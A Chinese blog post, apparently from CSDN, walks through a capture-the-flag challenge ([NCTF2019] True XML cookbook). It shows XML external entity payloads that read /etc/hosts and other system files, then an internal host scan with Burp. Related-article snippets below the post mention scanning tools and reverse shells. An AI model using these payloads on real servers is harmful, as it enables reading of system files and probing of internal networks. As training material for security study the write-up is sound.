XXE漏洞-内网探测

最新推荐文章于 2025-04-07 10:50:50 发布
最新推荐文章于 2025-04-07 10:50:50 发布
阅读量2.5k 收藏 7
点赞数 6
分类专栏: Web安全笔记 内网渗透 前端渗透笔记 文章标签: 安全 XXE 内网扫描
本文链接:https://blog.youkuaiyun.com/weixin_43221560/article/details/108152738
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

XXE漏洞-内网探测

XXE漏洞

XXE :Xml External Entity 外部实体注入攻击
是利用一种xml的语言进行的注入攻击
XXE漏洞原理就不详解了,一搜一大把

危害

  • 可以读取系统文件
  • 获取源代码
  • 进行SSRF
  • 进行Phar触发反序列化

CTF案例

本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]True%20XML%20cookbook
利用XXE漏洞进行SSRF攻击,探测内网主机
1.打开CTF题目
发现类似大佬的一个XXE-lab的题目
在这里插入图片描述
进行登录操作,用户名admin密码admin,抓包发现发送的是xml数据
那就尝试一下XXE攻击
在这里插入图片描述
2.尝试XXE攻击,线判断有没有回显点

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b "abc">
]>

<user><username>&b;</username><password>admin</password></user>

在这里插入图片描述
3.发现有回显点
开始构造代码,读取各种文件

外部引用可支持http,file等协议,
不同的语言支持的协议不同,但存在一些通用协议
php: file,http,ftp,php,compress.zlib,compress.bzip2,data,glob,phar
java: http,https,ftp,file,jar,netdoc,mailto,gopher
libxml2: file ,http,ftp
.net: file,http,https,ftp

这里可以利用file://,php://等伪协议进行获取文件
(获取代码最好使用php://filter进行base64转码)
在这里插入图片描述
先看看有flag文件没,发现并没有
就随意读取读取各种配置文件

/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包

最后在 /etc/hosts 发现内网地址

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///etc/hosts">
]>

<user><username>&b;</username><password>admin</password></user>

在这里插入图片描述
4.针对内网进行扫描
利用burp的爆破模块,快速扫描内网主机
在这里插入图片描述
最后在173.39.136.12成功找到flag
在这里插入图片描述

XXE漏洞原理、xxe-lab演示和防御
m0_61506558的博客
08-24 881
eXtensibleMarkupLanguage可扩展标记语言常用于从客户端向服务器提交数据。然后, 服务器端应用程序将处理这些数据,并且可能会返回一个包含XML或任何其他格式数据的响应。和HTML有一定的相像之处(部分语法不同),它还可以做配置文件、交换数据和图像格式等等。
XXE漏洞
qq_44768719的博客
11-04 585
** XXE漏洞 ** 这里是引用 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ...
XXE探测内网
Mssqj的博客
02-17 1160
内网通常指的是一个组织或企业内部的计算机网络,它连接了组织内部的计算机和设备,使得它们可以相互通信和共享资源。与互联网相对,内网是一个相对封闭和安全的网络环境。内网和外网在IP地址设置、覆盖范围、传输速率、安全性和连接方式等方面存在明显的区别。这些区别使得内网更加适合于组织或企业内部的使用,而外网则更适合于连接不同地区和国家之间的设备。通俗理解就是:内网就像一个大家庭或者一个公司的内部圈子,只有内部成员才能进入和互相交流。
史上最全的内网IP扫描攻略,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
04-07 1136
Fscan 是一款内网综合扫描工具,功能强大,可以一键自动化扫描,覆盖主机存活探测、端口扫描、常见服务爆破、MS17-010 漏洞利用、Redis 批量写公钥、计划任务反弹 Shell、读取 Win 网卡信息、Web 指纹识别、Web 漏洞扫描、NetBIOS 探测、域控识别等。简直是内网渗透的必备神器!
利用XXE进行内网主机探测
Vicl1fe的博客
12-22 1442
XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客 https://blog.youkuaiyun.com/qq_41918771/article/details/103628721 https://blog.youkuaiyun.com/qq_41918771/article/details/103641745 内网主机探测 先上脚本 import requests def build_xml(ip): xml...
XXE探测内网端口 [NCTF2019]True XML cookbook
weixin_73049307的博客
09-17 986
发现有回显点,之后就是开始构造代码,读取各种文件,这里可以用file://,php://等伪协议读取文件。根据长度来判断,应该是16,而且查到的ip后一段也是22,一般的都不是直接查到的。但还是不行,不过发现每次都会卡在11这里一会再出现完成的结果,盲猜一手12。(注意:这里的encodig="UTF-8"写不写都没关系,写了就是。/proc/net/arp 每个网络接口的arp表中dev包。很明显,还是504超时了,应该是找的文件不对。额,没有发现内网地址,换个文件试试。
iwebsec XXE漏洞
weixin_44135070的博客
01-22 930
使用POST方式提交数据,这里用到火狐的插件hackbar,首先点击load URL,再勾选post data按钮,将构造好的XML恶意代码放入post框内,点击Execute进行post数据。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
3. 内网探测:攻击者可以利用XXE漏洞探测内网中的服务和设备状态。 4. DoS攻击:通过大量请求外部资源,消耗服务器资源,导致服务不可用。 **三、XXE检测** 检测XXE漏洞通常分为白盒和黑盒两种方式: 1. **白盒**:...
XXE漏洞-XML 外部实体注入
zeroc009的博客
02-11 2849
XXE漏洞-XML 外部实体注入xxe介绍xml基础知识新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 xxe介绍 Xml外部实体注入漏洞(XML External Entity Injection)简称XXEXXE漏洞
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
XXE漏洞的存在允许攻击者通过构造恶意XML内容,在应用程序中读取文件系统的内容、执行操作系统命令、探测内网端口、攻击内网网站等。攻击者利用的手段包括但不限于: 1. 通过恶意构造的XML内容,注入外部实体引用,...
WEB常见漏洞XXE(靶场篇)
Javachichi的博客
11-10 1167
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
XXE漏洞解析演示
明哥哥知识分享
09-03 384
一. 源码 1. 有回显有报错测试代码 <?php $xml=simplexml_load_string($_GET['xml']); // print_r($xml); echo $xml ?> 2. 无回显无报错测试代码 <?php $xml=@simplexml_load_string($_POST['xml']); ?> 二. 内部实体演示 // &有问题,必须对&进行编码才可以 <!DOCTYPE foo [<!ELEMENT fo
网站漏洞扫描
buffedon的博客
07-23 3139
网站漏洞扫描工具利用1. Nessus基本选项2. AWVS(Acunetix)AWVS功能工作原理3. APPScan4. OWASP-ZAP设置代理目录扫描主动扫描查看结果,生成报告 web网站漏洞扫描 工具利用 1. Nessus 提供了完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus可同时在本机或远端上遥控,进行系统的漏洞扫描。 Nessue不仅可以扫描网站,还可以扫描主机 Nessue 使用8834端口作为后台,你在本地输入 https://localhost:8834 即可跳转到登
[NCTF2019]True XML cookbook + XXE攻击内网
ShenZ的博客
09-09 627
XXE XXE除了基本的读文件,还有很多用法,比如探测、攻击内网。能与其他一些漏洞结合起来使用。 读取/etc/hosts与/proc/net/arp推得内网存活主机ip wp [NCTF2019]True XML cookbook 和Fake XML cookbook差不多,尝试读passwd flag不在本机,所以XXE攻击内网 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin S
XXE 漏洞实战
qq_46540840的博客
07-25 614
XXE 漏洞实战 补充知识 namp使用 特点 ​ 主机探测:探测网络上的主机,如列出响应TCP,ICMP请求,开放特别端口的主机 ​ 端口扫描: 探测目标主机所开放的端口 ​ 版本探测:探测目标主机的网络服务,其服务名称及版本号 常用命令 nmap -sP 192.168.0.1/24 扫描目标地址所在的C段在线情况 nmap -O 识别目标地址的操作系统 nmap -sV 检测目标地址开放的端口对应的服务版本信息 nmap sn 检测主机,不进行端口扫描 扫描某一目标地址的端
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值